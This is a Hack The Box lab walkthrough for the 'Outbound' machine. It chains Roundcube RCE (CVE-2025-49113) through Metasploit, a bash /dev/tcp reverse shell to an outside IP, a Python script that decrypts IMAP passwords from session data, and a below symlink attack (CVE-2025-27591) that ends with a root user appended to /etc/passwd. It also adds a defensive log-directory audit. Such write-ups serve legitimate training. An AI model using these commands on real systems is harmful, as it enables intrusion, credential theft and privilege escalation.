> m4rt@CTF_ARCHIVE:~$


Hack The Box / LINUX / 2025-07-19

Hack The Box — Outbound (Linux)

Roundcube RCE (CVE-2025-49113) gives access to the web container, the IMAP password decrypted from a Roundcube session leads to SSH as jacob, and a symlink attack on below's log file (CVE-2025-27591) makes /etc/passwd world-writable, which gives root.

Target

  • IP: 10.129.229.101

Machine information

As is common in real-life pentests, you start the Outbound box with credentials for the following account:

  • tyler / LhKL1o9Nm3X2

Port scan

sudo nmap -sC -sV 10.129.229.101 -p- -T5 -v
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 0c:4b:d2:76:ab:10:06:92:05:dc:f7:55:94:7f:18:df (ECDSA)
|_  256 2d:6d:4a:4c:ee:2e:11:b6:c8:90:e6:83:e9:df:38:b0 (ED25519)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://mail.outbound.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Add mail.outbound.htb and outbound.htb to /etc/hosts.

Go to http://mail.outbound.htb.

It is Roundcube.

Log in with the provided tyler credentials.

Click the question mark icon.

We notice:

Roundcube Webmail 1.6.10

Note

You can also obtain the version without logging in:

curl http://mail.outbound.htb/roundcube/CHANGELOG.md | more

It confirms version 1.6.10.

This version is affected by CVE-2025-49113, an authenticated remote code execution vulnerability.

The exploit is available in Metasploit.

msfconsole
use exploit/multi/http/roundcube_auth_rce_cve_2025_49113
set LHOST tun0
set RHOSTS mail.outbound.htb
set USERNAME tyler
set PASSWORD LhKL1o9Nm3X2
exploit

We obtain a meterpreter shell.

shell

This shell is not very convenient, so we spawn a proper reverse shell instead.

Start a listener:

nc -vlnp 4444

On the target shell run:

bash -c 'bash -i >& /dev/tcp/10.10.15.37/4444 0>&1'

We obtain a reverse shell.

Upgrade shell:

script -qc /bin/bash /dev/null
# CTRL+z
stty raw -echo
fg

Check identity:

whoami

We are www-data.

We are inside a Docker container.

cd /var/www/html/roundcube
grep -nriE 'mysql' .

We notice:

./config/config.inc.php:28:$config['db_dsnw'] = 'mysql://roundcube:RCDBPass2025@localhost/roundcube';

Connect to MySQL:

mysql -u roundcube -h 127.0.0.1 -p

Use password:

RCDBPass2025

show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| roundcube          |
+--------------------+
use roundcube;
show tables;
+---------------------+
| Tables_in_roundcube |
+---------------------+
| cache               |
| cache_index         |
| cache_messages      |
| cache_shared        |
| cache_thread        |
| collected_addresses |
| contactgroupmembers |
| contactgroups       |
| contacts            |
| dictionary          |
| filestore           |
| identities          |
| responses           |
| searches            |
| session             |
| system              |
| users               |
+---------------------+
select * from users;
+---------+----------+-----------+---------------------+---------------------+---------------------+----------------------+----------+---------------------------------------------------+
| user_id | username | mail_host | created             | last_login          | failed_login        | failed_login_counter | language | preferences                                       |
+---------+----------+-----------+---------------------+---------------------+---------------------+----------------------+----------+---------------------------------------------------+
|       1 | jacob    | localhost | 2025-06-07 13:55:18 | 2025-06-11 07:52:49 | 2025-06-11 07:51:32 |                    1 | en_US    | a:1:{s:11:"client_hash";s:16:"hpLLqLwmqbyihpi7";} |
|       2 | mel      | localhost | 2025-06-08 12:04:51 | 2025-06-08 13:29:05 | NULL                |                 NULL | en_US    | a:1:{s:11:"client_hash";s:16:"GCrPGMkZvbsnc3xv";} |
|       3 | tyler    | localhost | 2025-06-08 13:28:55 | 2025-07-15 20:09:27 | 2025-07-15 20:09:02 |                    1 | en_US    | a:1:{s:11:"client_hash";s:16:"Y2Rz3HTwxwLJHevI";} |
+---------+----------+-----------+---------------------+---------------------+---------------------+----------------------+----------+---------------------------------------------------+
select * from identities;
+-------------+---------+---------------------+-----+----------+-------+--------------+-----------------+----------+-----+-----------+----------------+
| identity_id | user_id | changed             | del | standard | name  | organization | email           | reply-to | bcc | signature | html_signature |
+-------------+---------+---------------------+-----+----------+-------+--------------+-----------------+----------+-----+-----------+----------------+
|           1 |       1 | 2025-06-07 13:55:18 |   0 |        1 | jacob |              | jacob@localhost |          |     | NULL      |              0 |
|           2 |       2 | 2025-06-08 12:04:51 |   0 |        1 | mel   |              | mel@localhost   |          |     | NULL      |              0 |
|           3 |       3 | 2025-06-08 13:28:55 |   0 |        1 | tyler |              | tyler@localhost |          |     | NULL      |              0 |
+-------------+---------+---------------------+-----+----------+-------+--------------+-----------------+----------+-----+-----------+----------------+

Roundcube does not store passwords in the DB; it authenticates users through the IMAP server.

select * from session;

One session row contains serialized/base64 data, including:

username|s:5:"jacob";
...
password|s:32:"L7Rv00A8TuwJAr67kITxxcSgnIk25Am/";

So we have a credential pair for jacob:

  • jacob : L7Rv00A8TuwJAr67kITxxcSgnIk25Am/

However, this value is not the plaintext password: Roundcube keeps the IMAP password in the session encrypted with the instance's des_key.

The decrypt function is here:

  • https://github.com/roundcube/roundcubemail/blob/8f7cc42fd65e0f92bda3c05b7419fe6081680b8b/program/lib/Roundcube/rcube.php#L943

In /var/www/html/roundcube/config/config.inc.php we find key:

$config['des_key'] = 'rcmail-!24ByteDESkey*Str';

According to the Roundcube source, the cipher is DES-EDE3-CBC (triple DES in CBC mode), keyed with des_key; the IV is stored in front of the ciphertext and the whole blob is base64-encoded.

See attached script: attachments/decrypt.php.

php decrypt.php

We obtain password:

595mO8DmwGeD
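The attached decrypt.php is not reproduced on this page, so here is an added Python equivalent (not the author's script and not Roundcube's own code). It reproduces the logic of rcube::decrypt() in Roundcube 1.6 as described above: base64-decode, take the first 8 bytes as the IV, decrypt the rest with DES-EDE3-CBC under des_key, and strip PKCS#7 padding. It also shows how to pull the username and password fields out of the base64 session blob from the session table. It assumes the `cryptography` package is installed; the session blob SAMPLE_VARS is constructed here in the same layout as the real row, using the des_key and the session value quoted above.

```python
"""Recover the IMAP password from a Roundcube 1.6 session row (added example)."""
import base64
import os
import re

from cryptography.hazmat.primitives import padding
from cryptography.hazmat.primitives.ciphers import Cipher, modes

try:  # cryptography >= 43 moved 3DES into the "decrepit" namespace
    from cryptography.hazmat.decrepit.ciphers.algorithms import TripleDES
except ImportError:  # older releases still export it here
    from cryptography.hazmat.primitives.ciphers.algorithms import TripleDES

DES_KEY = b"rcmail-!24ByteDESkey*Str"                 # $config['des_key'] from config.inc.php
SESSION_PASSWORD = "L7Rv00A8TuwJAr67kITxxcSgnIk25Am/"  # password|s:32:"..." from the session table
IV_LEN = 8                                             # DES block size = IV length for DES-EDE3-CBC


def roundcube_decrypt(b64_cipher: str, des_key: bytes = DES_KEY) -> str:
    """Mirror rcube::decrypt(): base64 -> split off IV -> 3DES-CBC -> remove PKCS#7 padding."""
    raw = base64.b64decode(b64_cipher)
    iv, ct = raw[:IV_LEN], raw[IV_LEN:]
    if len(iv) < IV_LEN:  # Roundcube returns '' for a truncated/corrupt blob
        return ""
    decryptor = Cipher(TripleDES(des_key), modes.CBC(iv)).decryptor()
    padded = decryptor.update(ct) + decryptor.finalize()
    unpadder = padding.PKCS7(64).unpadder()  # block size given in bits
    return (unpadder.update(padded) + unpadder.finalize()).decode()


def roundcube_encrypt(clear: str, des_key: bytes = DES_KEY, iv=None) -> str:
    """Mirror rcube::encrypt(); a caller-supplied IV is only for reproducible tests."""
    iv = iv or os.urandom(IV_LEN)
    padder = padding.PKCS7(64).padder()
    padded = padder.update(clear.encode()) + padder.finalize()
    encryptor = Cipher(TripleDES(des_key), modes.CBC(iv)).encryptor()
    return base64.b64encode(iv + encryptor.update(padded) + encryptor.finalize()).decode()


# PHP session serialization stores each variable as  name|<serialized value>
_FIELD = re.compile(r'(?P<name>username|password)\|s:(?P<len>\d+):"(?P<val>[^"]*)";')


def parse_session_vars(vars_b64: str) -> dict:
    """Extract username/password from the base64 'vars' column of Roundcube's session table."""
    blob = base64.b64decode(vars_b64).decode("latin-1")
    found = {}
    for m in _FIELD.finditer(blob):
        if int(m.group("len")) == len(m.group("val")):  # honour the s:N length prefix
            found[m.group("name")] = m.group("val")
    return found


def recover_imap_credentials(vars_b64: str, des_key: bytes = DES_KEY) -> tuple:
    """Return (username, plaintext IMAP password) for one session row."""
    fields = parse_session_vars(vars_b64)
    return fields.get("username"), roundcube_decrypt(fields["password"], des_key)


# Constructed sample row: same layout as the real session data quoted in the writeup.
SAMPLE_VARS = base64.b64encode(
    ('username|s:5:"jacob";password|s:32:"%s";' % SESSION_PASSWORD).encode()
).decode()

if __name__ == "__main__":
    print(recover_imap_credentials(SAMPLE_VARS))
```

The defensive point is visible in the code: anyone who can read both config.inc.php and the session table can recover every logged-in user's IMAP password, because des_key is a static symmetric key and not a secret derived from the user. Keeping the web root unreadable to other services and rotating des_key after a compromise limits the damage.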

su jacob

Enter password and get a shell.

Log in to Roundcube with the jacob credentials.

There is this email from tyler:

Due to the recent change of policies your password has been changed.
Please use the following credentials to log into your account: gY4Wr3a1evp4
Remember to change your password when you next log into your account.
Thanks!
Tyler

ssh jacob@outbound.htb

Enter password gY4Wr3a1evp4.

We get a shell.

sudo -l
Matching Defaults entries for jacob on outbound:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin, use_pty

User jacob may run the following commands on outbound:
    (ALL : ALL) NOPASSWD: /usr/bin/below *, !/usr/bin/below --config*, !/usr/bin/below --debug*, !/usr/bin/below -d*

below is a system resource monitor from Meta (facebookincubator):

  • https://github.com/facebookincubator/below

sudo below

We see version 0.8.0.

This version is affected by CVE-2025-27591.

When run as root, below creates /var/log/below as a world-readable and world-writable directory, and inside it a world-readable and world-writable error_root.log.

Because it later opens that path as root without refusing symlinks, a local user can replace the file with a symlink and have root's open and permission change applied to whatever the link points at.

Remove error_root.log:

rm error_root.log

Create symbolic link to /etc/passwd:

ln -s /etc/passwd error_root.log

Run below:

sudo below

Quit with q.

ls -la /etc/passwd
-rw-rw-rw- 1 root root 1840 Jul 15 23:48 /etc/passwd
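For the defender, the preconditions of this bug are easy to audit and the developer-side fix is a small pattern. The following added Python example (not the writeup's own code and not code from the below project) does two things: audit_log_dir() reports a world-writable log directory without the sticky bit, world-writable log files, and any log entry that is a symlink, using lstat so the link is reported rather than followed; safe_open_log() shows how a privileged program should open its log file (O_NOFOLLOW, a private mode, and an fstat sanity check after opening). build_constructed_tree() creates a temporary directory that mimics the vulnerable layout so the check can run offline; the file names inside it other than error_root.log are constructed for the demo.

```python
"""Audit a privileged program's log directory for symlink-abuse preconditions (added example)."""
import os
import stat
import tempfile


def audit_log_dir(log_dir: str) -> list:
    """Return (path, finding) pairs for unsafe conditions; an empty list means nothing found."""
    findings = []
    try:
        dst = os.lstat(log_dir)  # lstat: never follow a link we are trying to detect
    except FileNotFoundError:
        return findings
    if stat.S_ISLNK(dst.st_mode):
        return [(log_dir, "log directory is itself a symlink")]
    if dst.st_mode & stat.S_IWOTH and not dst.st_mode & stat.S_ISVTX:
        findings.append((log_dir, "world-writable directory without sticky bit"))
    for name in sorted(os.listdir(log_dir)):
        path = os.path.join(log_dir, name)
        fst = os.lstat(path)
        if stat.S_ISLNK(fst.st_mode):
            findings.append((path, "symlink -> " + os.readlink(path)))
        elif fst.st_mode & stat.S_IWOTH:
            findings.append((path, "world-writable file"))
    return findings


def safe_open_log(path: str) -> int:
    """Open/create a log file the way a root daemon should: refuse symlinks at the final
    component, create with a private mode, and verify what we actually opened."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_APPEND | os.O_NOFOLLOW
    fd = os.open(path, flags, 0o640)  # O_NOFOLLOW makes a planted symlink fail with ELOOP
    try:
        fst = os.fstat(fd)
        if not stat.S_ISREG(fst.st_mode) or fst.st_nlink != 1:
            raise OSError(f"{path}: not a plain regular file, refusing to log there")
    except OSError:
        os.close(fd)
        raise
    return fd


def opens_safely(path: str) -> bool:
    """True if safe_open_log() accepts the path, False if it refuses it."""
    try:
        fd = safe_open_log(path)
    except OSError:
        return False
    os.close(fd)
    return True


def build_constructed_tree() -> dict:
    """Constructed temp layout mimicking the vulnerable state described in the writeup:
    a 0777 log directory containing a symlink named error_root.log to a stand-in passwd file."""
    root = tempfile.mkdtemp(prefix="below-audit-")
    log_dir = os.path.join(root, "below")
    os.mkdir(log_dir)
    os.chmod(log_dir, 0o777)
    target = os.path.join(root, "passwd")  # stand-in for /etc/passwd
    with open(target, "w") as fh:
        fh.write("root:x:0:0:root:/root:/bin/bash\n")
    link = os.path.join(log_dir, "error_root.log")
    os.symlink(target, link)
    plain = os.path.join(log_dir, "constructed.log")  # an ordinary, but 0666, log file
    open(plain, "w").close()
    os.chmod(plain, 0o666)
    return {"log_dir": log_dir, "symlink": link, "plain": plain, "target": target}


if __name__ == "__main__":
    tree = build_constructed_tree()
    for path, finding in audit_log_dir(tree["log_dir"]):
        print(f"{path}: {finding}")
    print("symlink accepted by safe_open_log:", opens_safely(tree["symlink"]))
```

Running audit_log_dir("/var/log/below") on a host gives the same report for the real directory. Note that safe_open_log() is a defence against the final path component only; the directory itself should also be owned by root and not world-writable, which is the other half of what the audit checks.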

Now that /etc/passwd is writable by everyone, we can append a UID 0 user:

pw=$(openssl passwd Password123); echo "r00t:${pw}:0:0:root:/root:/bin/bash" >> /etc/passwd
su r00t

Enter password Password123.

We obtain a shell as root.